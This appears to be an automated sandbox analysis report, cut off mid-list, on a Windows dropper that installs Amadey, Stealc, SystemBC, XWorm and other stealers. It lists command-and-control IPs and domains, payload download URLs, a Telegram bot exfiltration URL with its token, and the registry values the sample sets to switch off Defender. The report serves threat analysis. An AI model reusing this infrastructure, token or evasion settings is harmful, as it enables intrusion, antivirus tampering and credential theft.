Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
22-02-2025 07:48
Static task
static1
Behavioral task
behavioral1
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
88345910e7756216c80bf4046952980b.exe
Resource
win10v2004-20250217-en
General
-
Target
88345910e7756216c80bf4046952980b.exe
-
Size
2.1MB
-
MD5
88345910e7756216c80bf4046952980b
-
SHA1
f508e862e3d2b48a83dfa064d4655035953482c0
-
SHA256
c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704
-
SHA512
a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845
-
SSDEEP
49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
systembc
towerbingobongoboom.com
93.186.202.3
-
dns
5.132.191.104
Extracted
xworm
5.0
185.163.204.65:7000
SWaSxcOz2FkLWFU7
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/6084-2083-0x0000000000B90000-0x0000000000FD4000-memory.dmp family_povertystealer -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000244ac-3221.dat family_xworm behavioral2/memory/5324-3235-0x0000000000A50000-0x0000000000A80000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2716-136-0x0000000000300000-0x0000000000766000-memory.dmp healer behavioral2/memory/2716-135-0x0000000000300000-0x0000000000766000-memory.dmp healer behavioral2/memory/2716-238-0x0000000000300000-0x0000000000766000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Systembc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 24 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c66c0d7c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d6a6205f6a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gwhue.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8bb3392de9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ video.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1eaaf100c4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60cad02928.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e61d73ac7d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0bb5042f9a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ da79c1018d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0d9d6a5bdb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88345910e7756216c80bf4046952980b.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 2472 powershell.exe 26 1116 powershell.exe 28 1648 powershell.exe -
pid Process 3284 powershell.exe 2368 powershell.exe 5076 powershell.exe 2472 powershell.exe 1116 powershell.exe 1648 powershell.exe -
Downloads MZ/PE file 22 IoCs
flow pid Process 12 1464 skotes.exe 12 1464 skotes.exe 12 1464 skotes.exe 12 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 29 1464 skotes.exe 14 2472 powershell.exe 26 1116 powershell.exe 28 1648 powershell.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6840 msedge.exe 5180 chrome.exe 4864 chrome.exe 6084 chrome.exe 3252 chrome.exe 6168 msedge.exe 6848 msedge.exe -
Checks BIOS information in registry 2 TTPs 48 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60cad02928.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion da79c1018d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0bb5042f9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gwhue.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1eaaf100c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1eaaf100c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c66c0d7c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d6a6205f6a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e61d73ac7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0d9d6a5bdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion da79c1018d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8bb3392de9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e61d73ac7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0d9d6a5bdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60cad02928.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8bb3392de9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c66c0d7c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d6a6205f6a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gwhue.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0bb5042f9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation 88345910e7756216c80bf4046952980b.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation uXivbut.exe -
Executes dropped EXE 33 IoCs
pid Process 1464 skotes.exe 1324 78b2543906.exe 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 4680 60cad02928.exe 3016 0bb5042f9a.exe 1912 0d13ae9780.exe 2124 483d2fa8a0d53818306efeb32d3.exe 4176 91a34343bc.exe 5404 TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE 3124 5c66c0d7c6.exe 5520 d6a6205f6a.exe 5664 skotes.exe 3000 40571ba010.exe 1116 49e58b4688.exe 5920 da79c1018d.exe 6084 ftS1RPn.exe 2996 ebp51gY.exe 5044 DF9PCFR.exe 4572 uXivbut.exe 5544 Gxtuum.exe 5856 8QQOJj9.exe 6112 video.exe 1860 skotes.exe 1868 Gxtuum.exe 5640 gwhue.exe 5272 a4809023d2.exe 632 0d7b7da04a.exe 5324 7tzlyz8.exe 5760 1eaaf100c4.exe 5868 8bb3392de9.exe 4676 DF9PCFR.exe 3924 e61d73ac7d.exe 3548 0d9d6a5bdb.exe -
Identifies Wine through registry keys 2 TTPs 24 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine Gxtuum.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 8bb3392de9.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine e61d73ac7d.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 0d9d6a5bdb.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 1eaaf100c4.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 60cad02928.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 0bb5042f9a.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 5c66c0d7c6.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine d6a6205f6a.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine da79c1018d.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine video.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine gwhue.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091275021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60cad02928.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091314001\\60cad02928.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0bb5042f9a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091315001\\0bb5042f9a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d13ae9780.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091316001\\0d13ae9780.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\91a34343bc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091317001\\91a34343bc.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\78b2543906.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091274101\\78b2543906.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000001db51-28.dat autoit_exe behavioral2/files/0x0008000000023ccf-188.dat autoit_exe behavioral2/files/0x0008000000023cd6-221.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
pid Process 4972 88345910e7756216c80bf4046952980b.exe 1464 skotes.exe 2716 TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE 4680 60cad02928.exe 3016 0bb5042f9a.exe 2124 483d2fa8a0d53818306efeb32d3.exe 5404 TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE 3124 5c66c0d7c6.exe 5520 d6a6205f6a.exe 5664 skotes.exe 5920 da79c1018d.exe 6084 ftS1RPn.exe 2996 ebp51gY.exe 4572 uXivbut.exe 5544 Gxtuum.exe 5856 8QQOJj9.exe 6112 video.exe 1860 skotes.exe 1868 Gxtuum.exe 5640 gwhue.exe 5760 1eaaf100c4.exe 5868 8bb3392de9.exe 3924 e61d73ac7d.exe 3548 0d9d6a5bdb.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3000 set thread context of 5156 3000 40571ba010.exe 155 PID 5044 set thread context of 4676 5044 DF9PCFR.exe 159 PID 5760 set thread context of 3348 5760 1eaaf100c4.exe 173 PID 3924 set thread context of 6316 3924 e61d73ac7d.exe 186 PID 5272 set thread context of 2308 5272 a4809023d2.exe 166 PID 632 set thread context of 5508 632 0d7b7da04a.exe 168 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 88345910e7756216c80bf4046952980b.exe File created C:\Windows\Tasks\Gxtuum.job uXivbut.exe File created C:\Windows\Tasks\Test Task17.job video.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 62 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8bb3392de9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1eaaf100c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gwhue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 60cad02928.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49e58b4688.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a4809023d2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d13ae9780.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e61d73ac7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 91a34343bc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 40571ba010.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d7b7da04a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88345910e7756216c80bf4046952980b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0bb5042f9a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6a6205f6a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0d13ae9780.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language video.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uXivbut.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d9d6a5bdb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language da79c1018d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened 